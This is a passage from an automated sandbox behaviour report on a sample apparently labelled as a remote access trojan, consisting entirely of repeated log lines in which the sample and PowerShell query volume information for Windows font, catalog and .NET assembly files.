                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
